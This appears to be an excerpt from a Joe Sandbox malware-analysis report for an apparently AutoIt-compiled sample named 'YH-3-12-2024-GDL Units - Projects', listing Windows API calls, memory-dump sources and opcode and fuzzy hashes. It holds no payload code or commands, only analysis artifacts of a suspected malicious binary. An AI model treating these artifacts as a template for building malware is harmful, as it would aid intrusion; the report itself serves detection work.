                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: 6e91ffe96032218e56c242026ca4a13edfed454640c876c7c7ca44d4c1e928ea
                                                        • Instruction ID: 56130823c9747a1beffa18d42437c6420a69b020725d7991771f59320cfdc77e
                                                        • Opcode Fuzzy Hash: 6e91ffe96032218e56c242026ca4a13edfed454640c876c7c7ca44d4c1e928ea
                                                        • Instruction Fuzzy Hash: D94191B1108354AED752EF64D4559DF77ECFF99380F10082EB49AC3291EA38D689C752
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00840FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00840FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 008410B5
                                                          • Part of subcall function 00840FA5: RegCloseKey.ADVAPI32(?), ref: 0084101B
                                                          • Part of subcall function 00840FA5: FreeLibrary.KERNEL32(?), ref: 0084106D
                                                          • Part of subcall function 00840FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00841090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00841058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: f0374745084a75f61e2cea694de0f304af14d9e0de5c15a04d95316e89588a2e
                                                        • Instruction ID: 18763a20987f27dbdf9774e7fbea4ae90fb587a29a1abad8ed6b9919e8338821
                                                        • Opcode Fuzzy Hash: f0374745084a75f61e2cea694de0f304af14d9e0de5c15a04d95316e89588a2e
                                                        • Instruction Fuzzy Hash: BD31087590160DAFDF159B94DC89EFFB7BCFF09340F00016AE601E2141EB759E899AA0
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DB2E
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DB54
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0081DB57
                                                        • SysAllocString.OLEAUT32(?), ref: 0081DB75
                                                        • SysFreeString.OLEAUT32(?), ref: 0081DB7E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0081DBA3
                                                        • SysAllocString.OLEAUT32(?), ref: 0081DBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 179a455fbd4670ecdb3cde2efdbc41a09ac98c9b4dfbd48cf1173371b6120602
                                                        • Instruction ID: 2ac04713a474ed84ec8519d917115f836567829fde8bbd51061a1d3f406550a8
                                                        • Opcode Fuzzy Hash: 179a455fbd4670ecdb3cde2efdbc41a09ac98c9b4dfbd48cf1173371b6120602
                                                        • Instruction Fuzzy Hash: 11216D76604219AF9B109FA9DC88DEB73ACFF09370B018529FA15DB251DA749C8187A4
                                                        APIs
                                                          • Part of subcall function 00837D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00837DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008361C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008361D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0083620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00836217
                                                        • WSAGetLastError.WSOCK32 ref: 00836221
                                                        • closesocket.WSOCK32(00000000), ref: 0083624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00836263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: e479dc8ad0201eae3f61508b6297068781e86220ef5affc6c38051879029c302
                                                        • Instruction ID: cd40e6eb34bbfe8dbe5672023a46505650c1f81d483849fc3c8e18b144a2c356
                                                        • Opcode Fuzzy Hash: e479dc8ad0201eae3f61508b6297068781e86220ef5affc6c38051879029c302
                                                        • Instruction Fuzzy Hash: 71318275600118AFDB10AF18CC89BBE77A9FF85714F05802DFA05D7292DB74A814CAA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 3c77a27ceed03316a5cac35d904060f658e3ff0aca957a1dd4d30376eab4dfcf
                                                        • Instruction ID: f25231728d17e2fd1cf127901ba1d0d7109570bbf4ee962debd3d52eac66650c
                                                        • Opcode Fuzzy Hash: 3c77a27ceed03316a5cac35d904060f658e3ff0aca957a1dd4d30376eab4dfcf
                                                        • Instruction Fuzzy Hash: 5F2167B2205691A6D220A634AC06EE773DCFF6A314F204439FA4AC7193FB589DC2C394
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DC09
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DC2F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0081DC32
                                                        • SysAllocString.OLEAUT32 ref: 0081DC53
                                                        • SysFreeString.OLEAUT32 ref: 0081DC5C
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0081DC76
                                                        • SysAllocString.OLEAUT32(?), ref: 0081DC84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 47798b22b474e8623d1490969324b7a24793eb1a0d9f5514b74dd26af198a233
                                                        • Instruction ID: a4c7e156622a427f71950e2a6cd8fd0001b5587c2fc685e7a6b933facdf47e89
                                                        • Opcode Fuzzy Hash: 47798b22b474e8623d1490969324b7a24793eb1a0d9f5514b74dd26af198a233
                                                        • Instruction Fuzzy Hash: 54212475605205AF9B10DFA8DC89DAB77ECFF09360B108529FA15CB261DAB4DC81C7A4
                                                        APIs
                                                          • Part of subcall function 007C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007C1D73
                                                          • Part of subcall function 007C1D35: GetStockObject.GDI32(00000011), ref: 007C1D87
                                                          • Part of subcall function 007C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007C1D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00847632
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0084763F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0084764A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00847659
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00847665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 6bbd53e9d68a7f501d246599f31ea54cdd5e659d085158b974bf03a0a6a620b3
                                                        • Instruction ID: 61d5ec9753fdad68f9182fed307cd1f93950c020bf22b2aa19156d490c03b2a6
                                                        • Opcode Fuzzy Hash: 6bbd53e9d68a7f501d246599f31ea54cdd5e659d085158b974bf03a0a6a620b3
                                                        • Instruction Fuzzy Hash: EC118EB211021DBEEF119F64CC85EE77F6EFF08798F014114BA08A20A0CB729C21DBA4
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 007E9AE6
                                                          • Part of subcall function 007E3187: EncodePointer.KERNEL32(00000000), ref: 007E318A
                                                          • Part of subcall function 007E3187: __initp_misc_winsig.LIBCMT ref: 007E31A5
                                                          • Part of subcall function 007E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007E9EA0
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007E9EB4
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007E9EC7
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007E9EDA
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007E9EED
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007E9F00
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 007E9F13
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007E9F26
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007E9F39
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007E9F4C
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007E9F5F
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007E9F72
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007E9F85
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007E9F98
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007E9FAB
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007E9FBE
                                                        • __mtinitlocks.LIBCMT ref: 007E9AEB
                                                        • __mtterm.LIBCMT ref: 007E9AF4
                                                          • Part of subcall function 007E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007E9AF9,007E7CD0,0087A0B8,00000014), ref: 007E9C56
                                                          • Part of subcall function 007E9B5C: _free.LIBCMT ref: 007E9C5D
                                                          • Part of subcall function 007E9B5C: DeleteCriticalSection.KERNEL32(0087EC00,?,?,007E9AF9,007E7CD0,0087A0B8,00000014), ref: 007E9C7F
                                                        • __calloc_crt.LIBCMT ref: 007E9B19
                                                        • __initptd.LIBCMT ref: 007E9B3B
                                                        • GetCurrentThreadId.KERNEL32 ref: 007E9B42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: 3574d82826cd26ac8884ca96690eca380cbc032199294241c7ebd3b991ec7a2f
                                                        • Instruction ID: ee5b67030dc5cf571333b3d885360a0ac09a2dbb8d64eb32c02df7acd6fc9c5f
                                                        • Opcode Fuzzy Hash: 3574d82826cd26ac8884ca96690eca380cbc032199294241c7ebd3b991ec7a2f
                                                        • Instruction Fuzzy Hash: F1F0627361B791A9E774B6777C0B74A3691AF0A734B20462AF754C51D2FE2888418160
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007E3F85), ref: 007E4085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 007E408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 007E4097
                                                        • DecodePointer.KERNEL32(007E3F85), ref: 007E40B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: e8433be29839a9633005e204d4a7096dbe3e58a9e46dbaf1fd68f7e73df6a0b6
                                                        • Instruction ID: f760570e40ceac3734319a77d056eba9ad0f34a560c4773b9ddf74abebf73c34
                                                        • Opcode Fuzzy Hash: e8433be29839a9633005e204d4a7096dbe3e58a9e46dbaf1fd68f7e73df6a0b6
                                                        • Instruction Fuzzy Hash: 04E0B678581300EFEB20AF65EC0DB053AA5B706F42F10402AF611E12A1CFBA4604DB14
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                        • Instruction ID: 7bc4455bbacc749adf2ad829398fddeaa1e3908718058ddc1dccacbb47c8056c
                                                        • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                        • Instruction Fuzzy Hash: 70618C3050066ADBCF01EF64CC8AEBE37A5FF08308F04452DF9559B192EA78AC95CB90
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 00840E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008402BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008402FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00840320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00840349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0084038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00840399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 813b258e6c8b2f609556156f772c41e060bd45a3e8acc3fcd8afefa6cc1893a3
                                                        • Instruction ID: f8179e967f05f703af42acc0975fcf24af0c2b4c3c6ef139d2fbf5cfa65393b3
                                                        • Opcode Fuzzy Hash: 813b258e6c8b2f609556156f772c41e060bd45a3e8acc3fcd8afefa6cc1893a3
                                                        • Instruction Fuzzy Hash: 5D514731208204EFC714EF64C889EABBBE9FF89314F04491DF685872A2DB75E944CB52
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 008457FB
                                                        • GetMenuItemCount.USER32(00000000), ref: 00845832
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0084585A
                                                        • GetMenuItemID.USER32(?,?), ref: 008458C9
                                                        • GetSubMenu.USER32(?,?), ref: 008458D7
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00845928
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: f4ba8e7c2af6a5585572af6f61f942b4ddb6aa29fca7e90a6bfdfa39abfba314
                                                        • Instruction ID: 868daa6100d303a7a1a0ed19d0f68067a9158bf335bc93510589b2a007745984
                                                        • Opcode Fuzzy Hash: f4ba8e7c2af6a5585572af6f61f942b4ddb6aa29fca7e90a6bfdfa39abfba314
                                                        • Instruction Fuzzy Hash: 38514935A00619EFCF11EF64C849AAEBBB4FF49320F104069E901EB352CB74AE41CB90
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0081EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0081EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0081EFD3
                                                        • _memmove.LIBCMT ref: 0081EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0081F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0081F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 62bdb504d50d344545c240a1d3a4acc030386d115c048819d4a2f851d1906906
                                                        • Instruction ID: 786fb922877f48063ea8dc6b594d05f1fa426e9f0edb1e2b7d2e775ae843bfb1
                                                        • Opcode Fuzzy Hash: 62bdb504d50d344545c240a1d3a4acc030386d115c048819d4a2f851d1906906
                                                        • Instruction Fuzzy Hash: E2514CB5A00209DFDB14CF58C884AAAB7F8FF4C314B158569EE59DB302E735E951CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008222A3
                                                        • IsMenu.USER32(00000000), ref: 008222C3
                                                        • CreatePopupMenu.USER32 ref: 008222F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00822355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00822386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 6cfbf49fc4db774bc2cf9c0211a25fdbadbc89a8ea32295dfcd4b5b7aa31f3f5
                                                        • Instruction ID: e999e20a4032e32091e8814313ecb29007b2aa12a5b85d7432890b76670c4ca3
                                                        • Opcode Fuzzy Hash: 6cfbf49fc4db774bc2cf9c0211a25fdbadbc89a8ea32295dfcd4b5b7aa31f3f5
                                                        • Instruction Fuzzy Hash: 57517B70600269FBDF21CF68E988BAEBBE5FF45318F104169E811D72A1D3799984CB51
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 007C179A
                                                        • GetWindowRect.USER32(?,?), ref: 007C17FE
                                                        • ScreenToClient.USER32(?,?), ref: 007C181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007C182C
                                                        • EndPaint.USER32(?,?), ref: 007C1876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: b9c405e81976a06735b547bb3fe87fd80e6bd03138587684f195e2698cce9933
